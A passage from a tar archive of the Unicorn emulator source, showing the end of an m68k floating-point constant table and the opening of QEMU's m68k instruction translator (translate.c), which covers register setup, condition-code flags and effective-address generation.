0xB7CFAB287E9F7B36), make_floatx80_init(0x3FFF, 0xB85ECC66CB219835), make_floatx80_init(0x3FFF, 0xB8E4FD5A20A593DA), make_floatx80_init(0x3FFF, 0xB99F41F64AFF9BB5), make_floatx80_init(0x3FFF, 0xBA7F1E17842BBE7B), make_floatx80_init(0x3FFF, 0xBB4712857637E17D), make_floatx80_init(0x3FFF, 0xBBFABE8A4788DF6F), make_floatx80_init(0x3FFF, 0xBC9D0FAD2B689D79), make_floatx80_init(0x3FFF, 0xBD306A39471ECD86), make_floatx80_init(0x3FFF, 0xBDB6C731856AF18A), make_floatx80_init(0x3FFF, 0xBE31CAC502E80D70), make_floatx80_init(0x3FFF, 0xBEA2D55CE33194E2), make_floatx80_init(0x3FFF, 0xBF0B10B7C03128F0), make_floatx80_init(0x3FFF, 0xBF6B7A18DACB778D), make_floatx80_init(0x3FFF, 0xBFC4EA4663FA18F6), make_floatx80_init(0x3FFF, 0xC0181BDE8B89A454), make_floatx80_init(0x3FFF, 0xC065B066CFBF6439), make_floatx80_init(0x3FFF, 0xC0AE345F56340AE6), make_floatx80_init(0x3FFF, 0xC0F222919CB9E6A7) }; #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/translate.c����������������������������������������������������������0000664�0000000�0000000�00000556106�14675241067�0020404�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * m68k translation * * Copyright (c) 2005-2007 CodeSourcery * Written by Paul Brook * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "exec/cpu_ldst.h" #include "exec/translator.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "fpu/softfloat.h" //#define DEBUG_DISPATCH 1 #define DEFO32(name, offset) static TCGv QREG_##name; #define DEFO64(name, offset) static TCGv_i64 QREG_##name; #include "qregs.def" #undef DEFO32 #undef DEFO64 #define REG(insn, pos) (((insn) >> (pos)) & 7) #define DREG(insn, pos) tcg_ctx->cpu_dregs[REG(insn, pos)] #define AREG(insn, pos) get_areg(s, REG(insn, pos)) #define MACREG(acc) tcg_ctx->cpu_macc[acc] #define QREG_SP get_areg(s, 7) #define IS_NULL_QREG(t) (t == tcg_ctx->NULL_QREG) #include "exec/gen-icount.h" void m68k_tcg_init(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; char *p; int i; #define DEFO32(name, offset) \ QREG_##name = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, \ offsetof(CPUM68KState, offset), #name); #define DEFO64(name, offset) \ QREG_##name = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, \ offsetof(CPUM68KState, offset), #name); #include "qregs.def" #undef DEFO32 #undef DEFO64 tcg_ctx->cpu_halted = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, #ifdef _MSC_VER 0 - offsetof(M68kCPU, env) + #else -offsetof(M68kCPU, env) + #endif offsetof(CPUState, halted), "HALTED"); tcg_ctx->cpu_exception_index = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, #ifdef _MSC_VER 0 - offsetof(M68kCPU, env) + #else -offsetof(M68kCPU, env) + #endif offsetof(CPUState, exception_index), "EXCEPTION"); p = tcg_ctx->cpu_reg_names; for (i = 0; i < 8; i++) { sprintf(p, "D%d", i); tcg_ctx->cpu_dregs[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUM68KState, dregs[i]), p); p += 3; sprintf(p, "A%d", i); tcg_ctx->cpu_aregs[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUM68KState, aregs[i]), p); p += 3; } for (i = 0; i < 4; i++) { sprintf(p, "ACC%d", i); tcg_ctx->cpu_macc[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUM68KState, macc[i]), p); p += 5; } tcg_ctx->NULL_QREG = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, -4, "NULL"); tcg_ctx->store_dummy = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, -8, "NULL"); } /* internal defines */ typedef struct DisasContext { DisasContextBase base; CPUM68KState *env; target_ulong pc; CCOp cc_op; /* Current CC operation */ int cc_op_synced; TCGv_i64 mactmp; int done_mac; int writeback_mask; TCGv writeback[8]; #define MAX_TO_RELEASE 8 int release_count; TCGv release[MAX_TO_RELEASE]; // Unicorn struct uc_struct *uc; } DisasContext; static void init_release_array(DisasContext *s) { #ifdef CONFIG_DEBUG_TCG memset(s->release, 0, sizeof(s->release)); #endif s->release_count = 0; } static void do_release(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int i; for (i = 0; i < s->release_count; i++) { tcg_temp_free(tcg_ctx, s->release[i]); } init_release_array(s); } static TCGv mark_to_release(DisasContext *s, TCGv tmp) { g_assert(s->release_count < MAX_TO_RELEASE); return s->release[s->release_count++] = tmp; } static TCGv get_areg(DisasContext *s, unsigned regno) { if (s->writeback_mask & (1 << regno)) { return s->writeback[regno]; } else { TCGContext *tcg_ctx = s->uc->tcg_ctx; return tcg_ctx->cpu_aregs[regno]; } } static void delay_set_areg(DisasContext *s, unsigned regno, TCGv val, bool give_temp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->writeback_mask & (1 << regno)) { if (give_temp) { tcg_temp_free(tcg_ctx, s->writeback[regno]); s->writeback[regno] = val; } else { tcg_gen_mov_i32(tcg_ctx, s->writeback[regno], val); } } else { s->writeback_mask |= 1 << regno; if (give_temp) { s->writeback[regno] = val; } else { TCGv tmp = tcg_temp_new(tcg_ctx); s->writeback[regno] = tmp; tcg_gen_mov_i32(tcg_ctx, tmp, val); } } } static void do_writebacks(DisasContext *s) { unsigned mask = s->writeback_mask; if (mask) { TCGContext *tcg_ctx = s->uc->tcg_ctx; s->writeback_mask = 0; do { unsigned regno = ctz32(mask); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_aregs[regno], s->writeback[regno]); tcg_temp_free(tcg_ctx, s->writeback[regno]); mask &= mask - 1; } while (mask); } } /* is_jmp field values */ #define DISAS_JUMP DISAS_TARGET_0 /* only pc was modified dynamically */ #define DISAS_EXIT DISAS_TARGET_1 /* cpu state was modified dynamically */ #define IS_USER(s) (!(s->base.tb->flags & TB_FLAGS_MSR_S)) #define SFC_INDEX(s) ((s->base.tb->flags & TB_FLAGS_SFC_S) ? \ MMU_KERNEL_IDX : MMU_USER_IDX) #define DFC_INDEX(s) ((s->base.tb->flags & TB_FLAGS_DFC_S) ? \ MMU_KERNEL_IDX : MMU_USER_IDX) typedef void (*disas_proc)(CPUM68KState *env, DisasContext *s, uint16_t insn); #ifdef DEBUG_DISPATCH #define DISAS_INSN(name) \ static void real_disas_##name(CPUM68KState *env, DisasContext *s, \ uint16_t insn); \ static void disas_##name(CPUM68KState *env, DisasContext *s, \ uint16_t insn) \ { \ qemu_log("Dispatch " #name "\n"); \ real_disas_##name(env, s, insn); \ } \ static void real_disas_##name(CPUM68KState *env, DisasContext *s, \ uint16_t insn) #else #define DISAS_INSN(name) \ static void disas_##name(CPUM68KState *env, DisasContext *s, \ uint16_t insn) #endif static const uint8_t cc_op_live[CC_OP_NB] = { [CC_OP_DYNAMIC] = CCF_C | CCF_V | CCF_Z | CCF_N | CCF_X, [CC_OP_FLAGS] = CCF_C | CCF_V | CCF_Z | CCF_N | CCF_X, [CC_OP_ADDB] = CCF_X | CCF_N | CCF_V, [CC_OP_ADDW] = CCF_X | CCF_N | CCF_V, [CC_OP_ADDL] = CCF_X | CCF_N | CCF_V, [CC_OP_SUBB] = CCF_X | CCF_N | CCF_V, [CC_OP_SUBW] = CCF_X | CCF_N | CCF_V, [CC_OP_SUBL] = CCF_X | CCF_N | CCF_V, [CC_OP_CMPB] = CCF_X | CCF_N | CCF_V, [CC_OP_CMPW] = CCF_X | CCF_N | CCF_V, [CC_OP_CMPL] = CCF_X | CCF_N | CCF_V, [CC_OP_LOGIC] = CCF_X | CCF_N }; static void set_cc_op(DisasContext *s, CCOp op) { TCGContext *tcg_ctx = s->uc->tcg_ctx; CCOp old_op = s->cc_op; int dead; if (old_op == op) { return; } s->cc_op = op; s->cc_op_synced = 0; /* * Discard CC computation that will no longer be used. * Note that X and N are never dead. */ dead = cc_op_live[old_op] & ~cc_op_live[op]; if (dead & CCF_C) { tcg_gen_discard_i32(tcg_ctx, QREG_CC_C); } if (dead & CCF_Z) { tcg_gen_discard_i32(tcg_ctx, QREG_CC_Z); } if (dead & CCF_V) { tcg_gen_discard_i32(tcg_ctx, QREG_CC_V); } } /* Update the CPU env CC_OP state. */ static void update_cc_op(DisasContext *s) { if (!s->cc_op_synced) { TCGContext *tcg_ctx = s->uc->tcg_ctx; s->cc_op_synced = 1; tcg_gen_movi_i32(tcg_ctx, QREG_CC_OP, s->cc_op); } } /* Generate a jump to an immediate address. */ static void gen_jmp_im(DisasContext *s, uint32_t dest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; update_cc_op(s); tcg_gen_movi_i32(tcg_ctx, QREG_PC, dest); s->base.is_jmp = DISAS_JUMP; } /* Generate a jump to the address in qreg DEST. */ static void gen_jmp(DisasContext *s, TCGv dest) { TCGContext *tcg_ctx = s->uc->tcg_ctx; update_cc_op(s); tcg_gen_mov_i32(tcg_ctx, QREG_PC, dest); s->base.is_jmp = DISAS_JUMP; } static void gen_raise_exception(TCGContext *tcg_ctx, int nr) { TCGv_i32 tmp; tmp = tcg_const_i32(tcg_ctx, nr); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } static void gen_exception(DisasContext *s, uint32_t dest, int nr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; update_cc_op(s); tcg_gen_movi_i32(tcg_ctx, QREG_PC, dest); gen_raise_exception(tcg_ctx, nr); s->base.is_jmp = DISAS_NORETURN; } static inline void gen_addr_fault(DisasContext *s) { gen_exception(s, s->base.pc_next, EXCP_ADDRESS); } /* * Generate a load from the specified address. Narrow values are * sign extended to full register width. */ static inline TCGv gen_load(DisasContext *s, int opsize, TCGv addr, int sign, int index) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; tmp = tcg_temp_new_i32(tcg_ctx); switch(opsize) { case OS_BYTE: if (sign) tcg_gen_qemu_ld8s(tcg_ctx, tmp, addr, index); else tcg_gen_qemu_ld8u(tcg_ctx, tmp, addr, index); break; case OS_WORD: if (sign) tcg_gen_qemu_ld16s(tcg_ctx, tmp, addr, index); else tcg_gen_qemu_ld16u(tcg_ctx, tmp, addr, index); break; case OS_LONG: tcg_gen_qemu_ld32u(tcg_ctx, tmp, addr, index); break; default: g_assert_not_reached(); } return tmp; } /* Generate a store. */ static inline void gen_store(DisasContext *s, int opsize, TCGv addr, TCGv val, int index) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch(opsize) { case OS_BYTE: tcg_gen_qemu_st8(tcg_ctx, val, addr, index); break; case OS_WORD: tcg_gen_qemu_st16(tcg_ctx, val, addr, index); break; case OS_LONG: tcg_gen_qemu_st32(tcg_ctx, val, addr, index); break; default: g_assert_not_reached(); } } typedef enum { EA_STORE, EA_LOADU, EA_LOADS } ea_what; /* * Generate an unsigned load if VAL is 0 a signed load if val is -1, * otherwise generate a store. */ static TCGv gen_ldst(DisasContext *s, int opsize, TCGv addr, TCGv val, ea_what what, int index) { if (what == EA_STORE) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_store(s, opsize, addr, val, index); return tcg_ctx->store_dummy; } else { return mark_to_release(s, gen_load(s, opsize, addr, what == EA_LOADS, index)); } } /* Read a 16-bit immediate constant */ static inline uint16_t read_im16(CPUM68KState *env, DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t im; im = translator_lduw(tcg_ctx, env, s->pc); s->pc += 2; return im; } /* Read an 8-bit immediate constant */ static inline uint8_t read_im8(CPUM68KState *env, DisasContext *s) { return read_im16(env, s); } /* Read a 32-bit immediate constant. */ static inline uint32_t read_im32(CPUM68KState *env, DisasContext *s) { uint32_t im; im = read_im16(env, s) << 16; im |= 0xffff & read_im16(env, s); return im; } /* Read a 64-bit immediate constant. */ static inline uint64_t read_im64(CPUM68KState *env, DisasContext *s) { uint64_t im; im = (uint64_t)read_im32(env, s) << 32; im |= (uint64_t)read_im32(env, s); return im; } /* Calculate and address index. */ static TCGv gen_addr_index(DisasContext *s, uint16_t ext, TCGv tmp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv add; int scale; add = (ext & 0x8000) ? AREG(ext, 12) : DREG(ext, 12); if ((ext & 0x800) == 0) { tcg_gen_ext16s_i32(tcg_ctx, tmp, add); add = tmp; } scale = (ext >> 9) & 3; if (scale != 0) { tcg_gen_shli_i32(tcg_ctx, tmp, add, scale); add = tmp; } return add; } /* * Handle a base + index + displacement effective addresss. * A NULL_QREG base means pc-relative. */ static TCGv gen_lea_indexed(CPUM68KState *env, DisasContext *s, TCGv base) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t offset; uint16_t ext; TCGv add; TCGv tmp; uint32_t bd, od; offset = s->pc; ext = read_im16(env, s); if ((ext & 0x800) == 0 && !m68k_feature(s->env, M68K_FEATURE_WORD_INDEX)) return tcg_ctx->NULL_QREG; if (m68k_feature(s->env, M68K_FEATURE_M68000) && !m68k_feature(s->env, M68K_FEATURE_SCALED_INDEX)) { ext &= ~(3 << 9); } if (ext & 0x100) { /* full extension word format */ if (!m68k_feature(s->env, M68K_FEATURE_EXT_FULL)) return tcg_ctx->NULL_QREG; if ((ext & 0x30) > 0x10) { /* base displacement */ if ((ext & 0x30) == 0x20) { bd = (int16_t)read_im16(env, s); } else { bd = read_im32(env, s); } } else { bd = 0; } tmp = mark_to_release(s, tcg_temp_new(tcg_ctx)); if ((ext & 0x44) == 0) { /* pre-index */ add = gen_addr_index(s, ext, tmp); } else { add = tcg_ctx->NULL_QREG; } if ((ext & 0x80) == 0) { /* base not suppressed */ if (IS_NULL_QREG(base)) { base = mark_to_release(s, tcg_const_i32(tcg_ctx, offset + bd)); bd = 0; } if (!IS_NULL_QREG(add)) { tcg_gen_add_i32(tcg_ctx, tmp, add, base); add = tmp; } else { add = base; } } if (!IS_NULL_QREG(add)) { if (bd != 0) { tcg_gen_addi_i32(tcg_ctx, tmp, add, bd); add = tmp; } } else { add = mark_to_release(s, tcg_const_i32(tcg_ctx, bd)); } if ((ext & 3) != 0) { /* memory indirect */ base = mark_to_release(s, gen_load(s, OS_LONG, add, 0, IS_USER(s))); if ((ext & 0x44) == 4) { add = gen_addr_index(s, ext, tmp); tcg_gen_add_i32(tcg_ctx, tmp, add, base); add = tmp; } else { add = base; } if ((ext & 3) > 1) { /* outer displacement */ if ((ext & 3) == 2) { od = (int16_t)read_im16(env, s); } else { od = read_im32(env, s); } } else { od = 0; } if (od != 0) { tcg_gen_addi_i32(tcg_ctx, tmp, add, od); add = tmp; } } } else { /* brief extension word format */ tmp = mark_to_release(s, tcg_temp_new(tcg_ctx)); add = gen_addr_index(s, ext, tmp); if (!IS_NULL_QREG(base)) { tcg_gen_add_i32(tcg_ctx, tmp, add, base); if ((int8_t)ext) tcg_gen_addi_i32(tcg_ctx, tmp, tmp, (int8_t)ext); } else { tcg_gen_addi_i32(tcg_ctx, tmp, add, offset + (int8_t)ext); } add = tmp; } return add; } /* Sign or zero extend a value. */ static inline void gen_ext(TCGContext *tcg_ctx, TCGv res, TCGv val, int opsize, int sign) { switch (opsize) { case OS_BYTE: if (sign) { tcg_gen_ext8s_i32(tcg_ctx, res, val); } else { tcg_gen_ext8u_i32(tcg_ctx, res, val); } break; case OS_WORD: if (sign) { tcg_gen_ext16s_i32(tcg_ctx, res, val); } else { tcg_gen_ext16u_i32(tcg_ctx, res, val); } break; case OS_LONG: tcg_gen_mov_i32(tcg_ctx, res, val); break; default: g_assert_not_reached(); } } /* Evaluate all the CC flags. */ static void gen_flush_flags(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv t0, t1; switch (s->cc_op) { case CC_OP_FLAGS: return; case CC_OP_ADDB: case CC_OP_ADDW: case CC_OP_ADDL: tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, QREG_CC_X); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); /* Compute signed overflow for addition. */ t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); tcg_gen_sub_i32(tcg_ctx, t0, QREG_CC_N, QREG_CC_V); gen_ext(tcg_ctx, t0, t0, s->cc_op - CC_OP_ADDB, 1); tcg_gen_xor_i32(tcg_ctx, t1, QREG_CC_N, QREG_CC_V); tcg_gen_xor_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_andc_i32(tcg_ctx, QREG_CC_V, t1, QREG_CC_V); tcg_temp_free(tcg_ctx, t1); break; case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, QREG_CC_X); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); /* Compute signed overflow for subtraction. */ t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); tcg_gen_add_i32(tcg_ctx, t0, QREG_CC_N, QREG_CC_V); gen_ext(tcg_ctx, t0, t0, s->cc_op - CC_OP_SUBB, 1); tcg_gen_xor_i32(tcg_ctx, t1, QREG_CC_N, t0); tcg_gen_xor_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_and_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, t1); tcg_temp_free(tcg_ctx, t1); break; case CC_OP_CMPB: case CC_OP_CMPW: case CC_OP_CMPL: tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_C, QREG_CC_N, QREG_CC_V); tcg_gen_sub_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N, QREG_CC_V); gen_ext(tcg_ctx, QREG_CC_Z, QREG_CC_Z, s->cc_op - CC_OP_CMPB, 1); /* Compute signed overflow for subtraction. */ t0 = tcg_temp_new(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, t0, QREG_CC_Z, QREG_CC_N); tcg_gen_xor_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, QREG_CC_N); tcg_gen_and_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_mov_i32(tcg_ctx, QREG_CC_N, QREG_CC_Z); break; case CC_OP_LOGIC: tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); tcg_gen_movi_i32(tcg_ctx, QREG_CC_C, 0); tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); break; case CC_OP_DYNAMIC: gen_helper_flush_flags(tcg_ctx, tcg_ctx->cpu_env, QREG_CC_OP); s->cc_op_synced = 1; break; default: t0 = tcg_const_i32(tcg_ctx, s->cc_op); gen_helper_flush_flags(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); s->cc_op_synced = 1; break; } /* Note that flush_flags also assigned to env->cc_op. */ s->cc_op = CC_OP_FLAGS; } static inline TCGv gen_extend(DisasContext *s, TCGv val, int opsize, int sign) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; if (opsize == OS_LONG) { tmp = val; } else { tmp = mark_to_release(s, tcg_temp_new(tcg_ctx)); gen_ext(tcg_ctx, tmp, val, opsize, sign); } return tmp; } static void gen_logic_cc(DisasContext *s, TCGv val, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_ext(tcg_ctx, QREG_CC_N, val, opsize, 1); set_cc_op(s, CC_OP_LOGIC); } static void gen_update_cc_cmp(DisasContext *s, TCGv dest, TCGv src, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_i32(tcg_ctx, QREG_CC_N, dest); tcg_gen_mov_i32(tcg_ctx, QREG_CC_V, src); set_cc_op(s, CC_OP_CMPB + opsize); } static void gen_update_cc_add(TCGContext *tcg_ctx, TCGv dest, TCGv src, int opsize) { gen_ext(tcg_ctx, QREG_CC_N, dest, opsize, 1); tcg_gen_mov_i32(tcg_ctx, QREG_CC_V, src); } static inline int opsize_bytes(int opsize) { switch (opsize) { case OS_BYTE: return 1; case OS_WORD: return 2; case OS_LONG: return 4; case OS_SINGLE: return 4; case OS_DOUBLE: return 8; case OS_EXTENDED: return 12; case OS_PACKED: return 12; default: // g_assert_not_reached(); return 0; } } static inline int insn_opsize(int insn) { switch ((insn >> 6) & 3) { case 0: return OS_BYTE; case 1: return OS_WORD; case 2: return OS_LONG; default: // g_assert_not_reached(); return 0; } } static inline int ext_opsize(int ext, int pos) { switch ((ext >> pos) & 7) { case 0: return OS_LONG; case 1: return OS_SINGLE; case 2: return OS_EXTENDED; case 3: return OS_PACKED; case 4: return OS_WORD; case 5: return OS_DOUBLE; case 6: return OS_BYTE; default: // g_assert_not_reached(); return 0; } } /* * Assign value to a register. If the width is less than the register width * only the low part of the register is set. */ static void gen_partset_reg(TCGContext *tcg_ctx, int opsize, TCGv reg, TCGv val) { TCGv tmp; switch (opsize) { case OS_BYTE: tcg_gen_andi_i32(tcg_ctx, reg, reg, 0xffffff00); tmp = tcg_temp_new(tcg_ctx); tcg_gen_ext8u_i32(tcg_ctx, tmp, val); tcg_gen_or_i32(tcg_ctx, reg, reg, tmp); tcg_temp_free(tcg_ctx, tmp); break; case OS_WORD: tcg_gen_andi_i32(tcg_ctx, reg, reg, 0xffff0000); tmp = tcg_temp_new(tcg_ctx); tcg_gen_ext16u_i32(tcg_ctx, tmp, val); tcg_gen_or_i32(tcg_ctx, reg, reg, tmp); tcg_temp_free(tcg_ctx, tmp); break; case OS_LONG: case OS_SINGLE: tcg_gen_mov_i32(tcg_ctx, reg, val); break; default: g_assert_not_reached(); } } /* * Generate code for an "effective address". Does not adjust the base * register for autoincrement addressing modes. */ static TCGv gen_lea_mode(CPUM68KState *env, DisasContext *s, int mode, int reg0, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv tmp; uint16_t ext; uint32_t offset; switch (mode) { case 0: /* Data register direct. */ case 1: /* Address register direct. */ return tcg_ctx->NULL_QREG; case 3: /* Indirect postincrement. */ if (opsize == OS_UNSIZED) { return tcg_ctx->NULL_QREG; } /* fallthru */ case 2: /* Indirect register */ return get_areg(s, reg0); case 4: /* Indirect predecrememnt. */ if (opsize == OS_UNSIZED) { return tcg_ctx->NULL_QREG; } reg = get_areg(s, reg0); tmp = mark_to_release(s, tcg_temp_new(tcg_ctx)); if (reg0 == 7 && opsize == OS_BYTE && m68k_feature(s->env, M68K_FEATURE_M68000)) { tcg_gen_subi_i32(tcg_ctx, tmp, reg, 2); } else { tcg_gen_subi_i32(tcg_ctx, tmp, reg, opsize_bytes(opsize)); } return tmp; case 5: /* Indirect displacement. */ reg = get_areg(s, reg0); tmp = mark_to_release(s, tcg_temp_new(tcg_ctx)); ext = read_im16(env, s); tcg_gen_addi_i32(tcg_ctx, tmp, reg, (int16_t)ext); return tmp; case 6: /* Indirect index + displacement. */ reg = get_areg(s, reg0); return gen_lea_indexed(env, s, reg); case 7: /* Other */ switch (reg0) { case 0: /* Absolute short. */ offset = (int16_t)read_im16(env, s); return mark_to_release(s, tcg_const_i32(tcg_ctx, offset)); case 1: /* Absolute long. */ offset = read_im32(env, s); return mark_to_release(s, tcg_const_i32(tcg_ctx, offset)); case 2: /* pc displacement */ offset = s->pc; offset += (int16_t)read_im16(env, s); return mark_to_release(s, tcg_const_i32(tcg_ctx, offset)); case 3: /* pc index+displacement. */ return gen_lea_indexed(env, s, tcg_ctx->NULL_QREG); case 4: /* Immediate. */ default: return tcg_ctx->NULL_QREG; } } /* Should never happen. */ return tcg_ctx->NULL_QREG; } static TCGv gen_lea(CPUM68KState *env, DisasContext *s, uint16_t insn, int opsize) { int mode = extract32(insn, 3, 3); int reg0 = REG(insn, 0); return gen_lea_mode(env, s, mode, reg0, opsize); } /* * Generate code to load/store a value from/into an EA. If WHAT > 0 this is * a write otherwise it is a read (0 == sign extend, -1 == zero extend). * ADDRP is non-null for readwrite operands. */ static TCGv gen_ea_mode(CPUM68KState *env, DisasContext *s, int mode, int reg0, int opsize, TCGv val, TCGv *addrp, ea_what what, int index) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg, tmp, result; int32_t offset; switch (mode) { case 0: /* Data register direct. */ reg = tcg_ctx->cpu_dregs[reg0]; if (what == EA_STORE) { gen_partset_reg(tcg_ctx, opsize, reg, val); return tcg_ctx->store_dummy; } else { return gen_extend(s, reg, opsize, what == EA_LOADS); } case 1: /* Address register direct. */ reg = get_areg(s, reg0); if (what == EA_STORE) { tcg_gen_mov_i32(tcg_ctx, reg, val); return tcg_ctx->store_dummy; } else { return gen_extend(s, reg, opsize, what == EA_LOADS); } case 2: /* Indirect register */ reg = get_areg(s, reg0); return gen_ldst(s, opsize, reg, val, what, index); case 3: /* Indirect postincrement. */ reg = get_areg(s, reg0); result = gen_ldst(s, opsize, reg, val, what, index); if (what == EA_STORE || !addrp) { TCGv tmp = tcg_temp_new(tcg_ctx); if (reg0 == 7 && opsize == OS_BYTE && m68k_feature(s->env, M68K_FEATURE_M68000)) { tcg_gen_addi_i32(tcg_ctx, tmp, reg, 2); } else { tcg_gen_addi_i32(tcg_ctx, tmp, reg, opsize_bytes(opsize)); } delay_set_areg(s, reg0, tmp, true); } return result; case 4: /* Indirect predecrememnt. */ if (addrp && what == EA_STORE) { tmp = *addrp; } else { tmp = gen_lea_mode(env, s, mode, reg0, opsize); if (IS_NULL_QREG(tmp)) { return tmp; } if (addrp) { *addrp = tmp; } } result = gen_ldst(s, opsize, tmp, val, what, index); if (what == EA_STORE || !addrp) { delay_set_areg(s, reg0, tmp, false); } return result; case 5: /* Indirect displacement. */ case 6: /* Indirect index + displacement. */ do_indirect: if (addrp && what == EA_STORE) { tmp = *addrp; } else { tmp = gen_lea_mode(env, s, mode, reg0, opsize); if (IS_NULL_QREG(tmp)) { return tmp; } if (addrp) { *addrp = tmp; } } return gen_ldst(s, opsize, tmp, val, what, index); case 7: /* Other */ switch (reg0) { case 0: /* Absolute short. */ case 1: /* Absolute long. */ case 2: /* pc displacement */ case 3: /* pc index+displacement. */ goto do_indirect; case 4: /* Immediate. */ /* Sign extend values for consistency. */ switch (opsize) { case OS_BYTE: if (what == EA_LOADS) { offset = (int8_t)read_im8(env, s); } else { offset = read_im8(env, s); } break; case OS_WORD: if (what == EA_LOADS) { offset = (int16_t)read_im16(env, s); } else { offset = read_im16(env, s); } break; case OS_LONG: offset = read_im32(env, s); break; default: g_assert_not_reached(); } return mark_to_release(s, tcg_const_i32(tcg_ctx, offset)); default: return tcg_ctx->NULL_QREG; } } /* Should never happen. */ return tcg_ctx->NULL_QREG; } static TCGv gen_ea(CPUM68KState *env, DisasContext *s, uint16_t insn, int opsize, TCGv val, TCGv *addrp, ea_what what, int index) { int mode = extract32(insn, 3, 3); int reg0 = REG(insn, 0); return gen_ea_mode(env, s, mode, reg0, opsize, val, addrp, what, index); } static TCGv_ptr gen_fp_ptr(TCGContext *tcg_ctx, int freg) { TCGv_ptr fp = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, fp, tcg_ctx->cpu_env, offsetof(CPUM68KState, fregs[freg])); return fp; } static TCGv_ptr gen_fp_result_ptr(TCGContext *tcg_ctx) { TCGv_ptr fp = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, fp, tcg_ctx->cpu_env, offsetof(CPUM68KState, fp_result)); return fp; } static void gen_fp_move(TCGContext *tcg_ctx, TCGv_ptr dest, TCGv_ptr src) { TCGv t32; TCGv_i64 t64; t32 = tcg_temp_new(tcg_ctx); tcg_gen_ld16u_i32(tcg_ctx, t32, src, offsetof(FPReg, l.upper)); tcg_gen_st16_i32(tcg_ctx, t32, dest, offsetof(FPReg, l.upper)); tcg_temp_free(tcg_ctx, t32); t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, t64, src, offsetof(FPReg, l.lower)); tcg_gen_st_i64(tcg_ctx, t64, dest, offsetof(FPReg, l.lower)); tcg_temp_free_i64(tcg_ctx, t64); } static void gen_load_fp(DisasContext *s, int opsize, TCGv addr, TCGv_ptr fp, int index) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; TCGv_i64 t64; t64 = tcg_temp_new_i64(tcg_ctx); tmp = tcg_temp_new(tcg_ctx); switch (opsize) { case OS_BYTE: tcg_gen_qemu_ld8s(tcg_ctx, tmp, addr, index); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); break; case OS_WORD: tcg_gen_qemu_ld16s(tcg_ctx, tmp, addr, index); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); break; case 